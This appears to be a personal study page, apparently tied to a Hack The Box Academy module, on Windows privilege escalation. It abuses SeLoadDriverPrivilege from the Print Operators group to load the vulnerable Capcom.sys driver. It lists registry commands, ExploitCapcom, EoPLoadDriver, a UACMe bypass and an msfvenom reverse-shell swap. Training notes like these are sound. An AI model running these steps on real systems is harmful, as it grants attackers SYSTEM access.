search
LinkedInGithub
githubEdit

print-operators

hashtag
Print Operators

hashtag
METHOD: 1 - GUI

Use this EnableSeLoadDriverPrivilege.cpp to load the driver

EnableSeLoadDriverPrivilege.cpparrow-up-right Replace It with the code

code.c

#include <windows.h>
#include <assert.h>
#include <winternl.h>
#include <sddl.h>
#include <stdio.h>
#include "tchar.h"

Compile above code

cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp

Download capcom.sys and save it to C:\temp and add reference to this driver

capcom.sysarrow-up-right

reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"
reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1

Verify the driver is not loaded

DriverView.exearrow-up-right

Verify privilege is enabled

Verify capcom driver is listed

Using ExploitCapcom tool to escalate privileges (ExploitCapcomarrow-up-right)

hashtag
METHOD: 2 - No GUI

Modify the ExploitCapcom.cpp code before compiling

code.c

Modify CommandLine to "shell binary created with msfvenom"

Automating the steps

We can use a tool such as EoPLoadDriver to automate the process of enabling the privilege, creating the registry key, and executing NTLoadDriver to load the driver. To do this, we would run the following:

Clean-up

Windows 10 Version 1803, the SeLoadDriverPrivilege is not exploitable

HTB module link: https://academy.hackthebox.com/module/67/section/605

hashtag
Key Concept

  • SeLoadDriverPrivilege: * The Print Operators group grants this privilege, allowing the loading of device drivers. * This privilege is often disabled by default and may require a UAC bypass.

  • Vulnerable Driver (Capcom.sys): * This driver contains a vulnerability allowing arbitrary code execution with SYSTEM privileges.

  • Registry Manipulation: * Registry keys are used to register the vulnerable driver.

  • Exploitation: * A custom tool (ExploitCapcom.exe) is used to exploit the driver and gain SYSTEM access

Approach, Commands, Tools, and Techniques:

  1. Privilege Check: * whoami /priv (Verify SeLoadDriverPrivilege presence). * If not present, UAC bypass is needed.

  2. UAC Bypass: * UACMe tool. * Administrative command prompt.

  3. Driver Registration: * reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys" * reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1

  4. Driver Verification: * DriverView.exe (Nirsoft)

  5. Privilege Enablement: * EnableSeLoadDriverPrivilege.exe (Custom tool).

  6. Driver Load Verification: * DriverView.exe (Nirsoft).

  7. Exploitation: * ExploitCapcom.exe (Custom tool). * Modify ExploitCapcom.cpp for reverse shell (if needed).

  8. Automation: * EoPLoadDriver.exe (Automate driver loading). * EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\Tools\Capcom.sys

  9. Cleanup: * `reg delete HKCU\System\CurrentControlSet\Capcom

Commands:

  • whoami /priv

  • reg add

  • reg delete

*Tools:

  • UACMe

  • DriverView.exe (Nirsoft)

  • cl.exe (Microsoft C++ compiler)

  • EnableSeLoadDriverPrivilege.exe (Custom tool)

  • ExploitCapcom.exe (Custom tool)

  • EoPLoadDriver.exe Techniques:

  • Leveraging SeLoadDriverPrivilege.

  • Exploiting vulnerable drivers.

  • Registry manipulation.

  • UAC bypass. Important Notes:

  • The Capcom.sys driver is a known vulnerable driver.

  • The registry path HKCU\System\CurrentControlSet is not usable on windows 10 1803 and later.

  • Always be very cautious when loading drivers.

Previoushyper-v-administratorsNextServer Operators

Last updated